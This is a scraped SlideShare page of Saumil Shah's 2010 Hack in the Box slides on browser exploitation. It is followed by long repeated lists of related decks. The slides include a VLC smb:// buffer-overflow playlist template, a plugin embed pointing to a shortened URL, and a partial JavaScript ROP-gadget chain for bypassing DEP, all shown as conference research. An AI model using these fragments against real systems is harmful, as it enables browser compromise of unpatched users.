SlideShare una empresa de Scribd logo

W.E.B. 2010 - Web, Exploits, Browsers

Saumil Shah
Saumil Shah

1) The document discusses various web browser exploits discovered by the author, including ones that bypass security features like ASLR, DEP, and sandboxing. 2) Examples of exploits discussed include ones that use JavaScript obfuscation, SMB protocol vulnerabilities in VLC media player, and memory corruption bugs. 3) The author argues that fundamental changes are needed to web application delivery and security models to fully address the ongoing issues, including changes to HTML, HTTP, and how browsers isolate content.

Tecnología
1 de 38
W.E.B. 2010Web . Exploits . Browsers Saumil Shah Hack in the Box - Kuala Lumpur 2010
# who am i Saumil Shah, CEO Net-square LinkedIn: saumilshah
LOOK AT ALL THE COOL STUFF!! 5
5 33% MORE!
5 With JIT!Fights DEP, ASLR!
5 Worldwide coverage, Hides your tracks.
5 ...as never seen before!
5 GUARANTEED!! Fresh new bugs, Present on most computers
I can haz sandbox I Also Can!
IM IN UR BASE KILLING UR D00DZ Sploit Time!
See no EVAL CVE 2010-2883 (0+1)day exploit Obfuscated Javascript decoded without using eval, document.write, etc.
Who you gonna call?
howstuffworks - Anti Virus YER NOT ON THE LIST! COME ON IN.
howstuffworks - Anti Virus These are not the sploitz you're looking for.
0-day to the Face! "To get our new signature files you need a valid support plan."
...and keep on patching
W3C "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]
Application Delivery The Web at present Authentication Statefulness Data Typing Non-mutable HTTP HTML AJAX Flash Sandbox HTML5 Anti-XSS WAF Silverlight Web sockets MIND THE GAP
Sploit Time!
Making the impossible possible smb:// mrl buffer overflow
VLC smb:// overflow - playlist <?xml version="1.0" encoding="UTF-8"?> <playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> <title>Playlist</title> <trackList> <track> <location> smb://example.com@0.0.0.0/foo/#{AAAAAAAA....} </location> <extension application="http://www.videolan.org/vlc/playlist/0"> <vlc:id>0</vlc:id> </extension> </track> </trackList> </playlist>
...just add bit.ly smb:// mrl buffer overflow
100% Pure Alphanum!
VLC smb overflow - HTMLized!! <embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" /> I'm in ur browser.... ...blowin up ur g00dz pwn
I'm an evil Javascript I'm an innocent image
function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}var addressof=new Array();addressof["ropnop"]=0x6d81bdf0;addressof["xchg_eax_esp_ret"]=0x6d81bdef;addressof["pop_eax_ret"]=0x6d906744;addressof["pop_ecx_ret"]=0x6d81cd57;addressof["mov_peax_ecx_ret"]=0x6d979720;addressof["mov_eax_pecx_ret"]=0x6d8d7be0;addressof["mov_pecx_eax_ret"]=0x6d8eee01;addressof["inc_eax_ret"]=0x6d838f54;addressof["add_eax_4_ret"]=0x00000000;addressof["call_peax_ret"]=0x6d8aec31;addressof["add_esp_24_ret"]=0x00000000;addressof["popad_ret"]=0x6d82a8a1;addressof["call_peax"]=0x6d802597;function call_ntallocatevirtualmemory(baseptr,size,callnum){var ropnop=packv(addressof["ropnop"]);var pop_eax_ret=packv(addressof["pop_eax_ret"]);var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);var call_peax_ret=packv(addressof["call_peax_ret"]);var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);var popad_ret=packv(addressof["popad_ret"]);var retval="" EET - Exploit Enabler Technology <canvas>
The Solution? HTML 8.0 HTTP 2.0 Browser Security Model Self Contained Apps
shoutz... L33tdawg, Amy, cbelinda KUL volunteerz NL crew Paul Vixie
kthxbai www.net-square.com secure . automate . innovate

Recomendados

Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruMichele Orru
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy StyleRob Fuller
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruMichele Orru
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Michele Orru
 
Buscar proceso _search_linux_process
Buscar proceso _search_linux_processBuscar proceso _search_linux_process
Buscar proceso _search_linux_processJames Jara
 
Node.js Anti Patterns
Node.js Anti PatternsNode.js Anti Patterns
Node.js Anti PatternsBen Hall
 
Find out if_sshd_is_process_is_running_or_not
Find out if_sshd_is_process_is_running_or_notFind out if_sshd_is_process_is_running_or_not
Find out if_sshd_is_process_is_running_or_notJames Jara
 

Recomendados

Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Rob Fuller
 
Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruMichele Orru
 
Practical Exploitation - Webappy Style
Practical Exploitation - Webappy StylePractical Exploitation - Webappy Style
Practical Exploitation - Webappy StyleRob Fuller
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruMichele Orru
 
Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Advances in BeEF - AthCon2012
Advances in BeEF - AthCon2012Michele Orru
 
Buscar proceso _search_linux_process
Buscar proceso _search_linux_processBuscar proceso _search_linux_process
Buscar proceso _search_linux_processJames Jara
 
Node.js Anti Patterns
Node.js Anti PatternsNode.js Anti Patterns
Node.js Anti PatternsBen Hall
 
Find out if_sshd_is_process_is_running_or_not
Find out if_sshd_is_process_is_running_or_notFind out if_sshd_is_process_is_running_or_not
Find out if_sshd_is_process_is_running_or_notJames Jara
 
Installar desde la_fuente_linux_make_configure
Installar desde la_fuente_linux_make_configureInstallar desde la_fuente_linux_make_configure
Installar desde la_fuente_linux_make_configureJames Jara
 
톰캣 #05+b-root-deployment
톰캣 #05+b-root-deployment톰캣 #05+b-root-deployment
톰캣 #05+b-root-deploymentGyuSeok Lee
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Rob Fuller
 
톰캣 #05+a-배치-parallel deployment
톰캣 #05+a-배치-parallel deployment톰캣 #05+a-배치-parallel deployment
톰캣 #05+a-배치-parallel deploymentGyuSeok Lee
 
Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouE Hacking
 
High profile drupal websites
High profile drupal websitesHigh profile drupal websites
High profile drupal websitesdrupalforest
 
Checkear si esta_inslatado_un_modulo_en_apache
Checkear si esta_inslatado_un_modulo_en_apacheCheckear si esta_inslatado_un_modulo_en_apache
Checkear si esta_inslatado_un_modulo_en_apacheJames Jara
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupAdam Caudill
 
Httpd sys content_t_apache_linux
Httpd sys content_t_apache_linuxHttpd sys content_t_apache_linux
Httpd sys content_t_apache_linuxJames Jara
 
Ver logs de_apache_en_linux
Ver logs de_apache_en_linuxVer logs de_apache_en_linux
Ver logs de_apache_en_linuxJames Jara
 
ITCamp 2018 - Jayson Street - Securing the human!
ITCamp 2018 - Jayson Street - Securing the human!ITCamp 2018 - Jayson Street - Securing the human!
ITCamp 2018 - Jayson Street - Securing the human!ITCamp
 
Robots
RobotsRobots
RobotsBig Fuga
 
Django? An attempt to answer all the questions you didn't know you wanted to ...
Django? An attempt to answer all the questions you didn't know you wanted to ...Django? An attempt to answer all the questions you didn't know you wanted to ...
Django? An attempt to answer all the questions you didn't know you wanted to ...Joey Wilhelm
 
Http only cookie
Http only cookieHttp only cookie
Http only cookiefool2fish
 
It's the people, stupid.
It's the people, stupid.It's the people, stupid.
It's the people, stupid.Jan Schaumann
 
Город никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never SleepsГород никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never SleepsPositive Hack Days
 
Preconnect, prefetch, prerender...
Preconnect, prefetch, prerender...Preconnect, prefetch, prerender...
Preconnect, prefetch, prerender...MilanAryal
 
Buscar un rpm_instalado
Buscar un rpm_instaladoBuscar un rpm_instalado
Buscar un rpm_instaladoJames Jara
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Web Security: A Journey - UC San Diego
Web Security: A Journey - UC San DiegoWeb Security: A Journey - UC San Diego
Web Security: A Journey - UC San DiegoSaumil Shah
 
Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Saumil Shah
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A PrimerSaumil Shah
 

Más contenido relacionado

La actualidad más candente

Installar desde la_fuente_linux_make_configure
Installar desde la_fuente_linux_make_configureInstallar desde la_fuente_linux_make_configure
Installar desde la_fuente_linux_make_configureJames Jara
 
톰캣 #05+b-root-deployment
톰캣 #05+b-root-deployment톰캣 #05+b-root-deployment
톰캣 #05+b-root-deploymentGyuSeok Lee
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Rob Fuller
 
톰캣 #05+a-배치-parallel deployment
톰캣 #05+a-배치-parallel deployment톰캣 #05+a-배치-parallel deployment
톰캣 #05+a-배치-parallel deploymentGyuSeok Lee
 
Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouE Hacking
 
High profile drupal websites
High profile drupal websitesHigh profile drupal websites
High profile drupal websitesdrupalforest
 
Checkear si esta_inslatado_un_modulo_en_apache
Checkear si esta_inslatado_un_modulo_en_apacheCheckear si esta_inslatado_un_modulo_en_apache
Checkear si esta_inslatado_un_modulo_en_apacheJames Jara
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupAdam Caudill
 
Httpd sys content_t_apache_linux
Httpd sys content_t_apache_linuxHttpd sys content_t_apache_linux
Httpd sys content_t_apache_linuxJames Jara
 
Ver logs de_apache_en_linux
Ver logs de_apache_en_linuxVer logs de_apache_en_linux
Ver logs de_apache_en_linuxJames Jara
 
ITCamp 2018 - Jayson Street - Securing the human!
ITCamp 2018 - Jayson Street - Securing the human!ITCamp 2018 - Jayson Street - Securing the human!
ITCamp 2018 - Jayson Street - Securing the human!ITCamp
 
Django? An attempt to answer all the questions you didn't know you wanted to ...
Django? An attempt to answer all the questions you didn't know you wanted to ...Django? An attempt to answer all the questions you didn't know you wanted to ...
Django? An attempt to answer all the questions you didn't know you wanted to ...Joey Wilhelm
 
Http only cookie
Http only cookieHttp only cookie
Http only cookiefool2fish
 
It's the people, stupid.
It's the people, stupid.It's the people, stupid.
It's the people, stupid.Jan Schaumann
 
Город никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never SleepsГород никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never SleepsPositive Hack Days
 
Preconnect, prefetch, prerender...
Preconnect, prefetch, prerender...Preconnect, prefetch, prerender...
Preconnect, prefetch, prerender...MilanAryal
 
Buscar un rpm_instalado
Buscar un rpm_instaladoBuscar un rpm_instalado
Buscar un rpm_instaladoJames Jara
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 

La actualidad más candente (19)

Installar desde la_fuente_linux_make_configure
Installar desde la_fuente_linux_make_configureInstallar desde la_fuente_linux_make_configure
Installar desde la_fuente_linux_make_configure
 
톰캣 #05+b-root-deployment
톰캣 #05+b-root-deployment톰캣 #05+b-root-deployment
톰캣 #05+b-root-deployment
 
Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014Attacker Ghost Stories - ShmooCon 2014
Attacker Ghost Stories - ShmooCon 2014
 
톰캣 #05+a-배치-parallel deployment
톰캣 #05+a-배치-parallel deployment톰캣 #05+a-배치-parallel deployment
톰캣 #05+a-배치-parallel deployment
 
Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing You
 
High profile drupal websites
High profile drupal websitesHigh profile drupal websites
High profile drupal websites
 
Checkear si esta_inslatado_un_modulo_en_apache
Checkear si esta_inslatado_un_modulo_en_apacheCheckear si esta_inslatado_un_modulo_en_apache
Checkear si esta_inslatado_un_modulo_en_apache
 
Java script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers GroupJava script, security and you - Tri-Cities Javascript Developers Group
Java script, security and you - Tri-Cities Javascript Developers Group
 
Httpd sys content_t_apache_linux
Httpd sys content_t_apache_linuxHttpd sys content_t_apache_linux
Httpd sys content_t_apache_linux
 
Ver logs de_apache_en_linux
Ver logs de_apache_en_linuxVer logs de_apache_en_linux
Ver logs de_apache_en_linux
 
ITCamp 2018 - Jayson Street - Securing the human!
ITCamp 2018 - Jayson Street - Securing the human!ITCamp 2018 - Jayson Street - Securing the human!
ITCamp 2018 - Jayson Street - Securing the human!
 
Robots
RobotsRobots
Robots
 
Django? An attempt to answer all the questions you didn't know you wanted to ...
Django? An attempt to answer all the questions you didn't know you wanted to ...Django? An attempt to answer all the questions you didn't know you wanted to ...
Django? An attempt to answer all the questions you didn't know you wanted to ...
 
Http only cookie
Http only cookieHttp only cookie
Http only cookie
 
It's the people, stupid.
It's the people, stupid.It's the people, stupid.
It's the people, stupid.
 
Город никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never SleepsГород никогда не спит / The City Never Sleeps
Город никогда не спит / The City Never Sleeps
 
Preconnect, prefetch, prerender...
Preconnect, prefetch, prerender...Preconnect, prefetch, prerender...
Preconnect, prefetch, prerender...
 
Buscar un rpm_instalado
Buscar un rpm_instaladoBuscar un rpm_instalado
Buscar un rpm_instalado
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 

Destacado

Web Security: A Journey - UC San Diego
Web Security: A Journey - UC San DiegoWeb Security: A Journey - UC San Diego
Web Security: A Journey - UC San DiegoSaumil Shah
 
Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Saumil Shah
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A PrimerSaumil Shah
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to DebuggersSaumil Shah
 
Hack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsHack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsSaumil Shah
 
How Functions Work
How Functions WorkHow Functions Work
How Functions WorkSaumil Shah
 
Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSSaumil Shah
 

Destacado (7)

Web Security: A Journey - UC San Diego
Web Security: A Journey - UC San DiegoWeb Security: A Journey - UC San Diego
Web Security: A Journey - UC San Diego
 
Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A Primer
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to Debuggers
 
Hack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsHack.LU - The Infosec Crossroads
Hack.LU - The Infosec Crossroads
 
How Functions Work
How Functions WorkHow Functions Work
How Functions Work
 
Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMS
 

Similar a W.E.B. 2010 - Web, Exploits, Browsers

Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceSaumil Shah
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksPietro Polsinelli
 
2010 A Net Odyssey
2010 A Net Odyssey2010 A Net Odyssey
2010 A Net OdysseySaumil Shah
 
What happens when firefox crashes?
What happens when firefox crashes?What happens when firefox crashes?
What happens when firefox crashes?Erik Rose
 
An Introduction to Solr
An Introduction to SolrAn Introduction to Solr
An Introduction to Solrtomhill
 
Browser Horror Stories
Browser Horror StoriesBrowser Horror Stories
Browser Horror StoriesEC-Council
 
Surviving the Internet in 2010
Surviving the Internet in 2010Surviving the Internet in 2010
Surviving the Internet in 2010Saumil Shah
 
Ajax to the Moon
Ajax to the MoonAjax to the Moon
Ajax to the Moondavejohnson
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Securitylevigross
 
The Ajax Experience: State Of The Browsers
The Ajax Experience: State Of The BrowsersThe Ajax Experience: State Of The Browsers
The Ajax Experience: State Of The BrowsersPeter-Paul Koch
 
Bruce Lawson HTML5 South By SouthWest presentation
Bruce Lawson HTML5 South By SouthWest presentationBruce Lawson HTML5 South By SouthWest presentation
Bruce Lawson HTML5 South By SouthWest presentationbrucelawson
 
Los Angeles HTML5 User Group Meeting Ask the Expert Session
Los Angeles HTML5 User Group Meeting Ask the Expert SessionLos Angeles HTML5 User Group Meeting Ask the Expert Session
Los Angeles HTML5 User Group Meeting Ask the Expert SessionPeter Lubbers
 
Best practices in museum search
Best practices in museum search Best practices in museum search
Best practices in museum searchNate Solas
 
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schillerscottschiller
 
Creating Yahoo Mobile Widgets
Creating Yahoo Mobile WidgetsCreating Yahoo Mobile Widgets
Creating Yahoo Mobile WidgetsRicardo Varela
 
You wanna crypto in AEM
You wanna crypto in AEMYou wanna crypto in AEM
You wanna crypto in AEMDamien Antipa
 
Recent Trends in Cyber Security
Recent Trends in Cyber SecurityRecent Trends in Cyber Security
Recent Trends in Cyber SecurityAyoma Wijethunga
 

Similar a W.E.B. 2010 - Web, Exploits, Browsers (20)

Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacks
 
2010 A Net Odyssey
2010 A Net Odyssey2010 A Net Odyssey
2010 A Net Odyssey
 
What happens when firefox crashes?
What happens when firefox crashes?What happens when firefox crashes?
What happens when firefox crashes?
 
An Introduction to Solr
An Introduction to SolrAn Introduction to Solr
An Introduction to Solr
 
Browser Horror Stories
Browser Horror StoriesBrowser Horror Stories
Browser Horror Stories
 
Surviving the Internet in 2010
Surviving the Internet in 2010Surviving the Internet in 2010
Surviving the Internet in 2010
 
Ajax to the Moon
Ajax to the MoonAjax to the Moon
Ajax to the Moon
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
 
Yahoo for the Masses
Yahoo for the MassesYahoo for the Masses
Yahoo for the Masses
 
The Ajax Experience: State Of The Browsers
The Ajax Experience: State Of The BrowsersThe Ajax Experience: State Of The Browsers
The Ajax Experience: State Of The Browsers
 
Bruce Lawson HTML5 South By SouthWest presentation
Bruce Lawson HTML5 South By SouthWest presentationBruce Lawson HTML5 South By SouthWest presentation
Bruce Lawson HTML5 South By SouthWest presentation
 
[In Control 2010] HTML5
[In Control 2010] HTML5[In Control 2010] HTML5
[In Control 2010] HTML5
 
Los Angeles HTML5 User Group Meeting Ask the Expert Session
Los Angeles HTML5 User Group Meeting Ask the Expert SessionLos Angeles HTML5 User Group Meeting Ask the Expert Session
Los Angeles HTML5 User Group Meeting Ask the Expert Session
 
Best practices in museum search
Best practices in museum search Best practices in museum search
Best practices in museum search
 
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller
"Probably, Maybe, No: The State of HTML5 Audio" - Scott Schiller
 
Creating Yahoo Mobile Widgets
Creating Yahoo Mobile WidgetsCreating Yahoo Mobile Widgets
Creating Yahoo Mobile Widgets
 
You wanna crypto in AEM
You wanna crypto in AEMYou wanna crypto in AEM
You wanna crypto in AEM
 
Recent Trends in Cyber Security
Recent Trends in Cyber SecurityRecent Trends in Cyber Security
Recent Trends in Cyber Security
 

Más de Saumil Shah

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksSaumil Shah
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSSaumil Shah
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkSaumil Shah
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Saumil Shah
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise PresentationsSaumil Shah
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceSaumil Shah
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020Saumil Shah
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadSaumil Shah
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceSaumil Shah
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadSaumil Shah
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadSaumil Shah
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019Saumil Shah
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-XSaumil Shah
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDSaumil Shah
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019Saumil Shah
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019Saumil Shah
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM AssemblySaumil Shah
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSSaumil Shah
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling PhotographSaumil Shah
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKSaumil Shah
 

Más de Saumil Shah (20)

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
 

Último

DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamUiPathCommunity
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
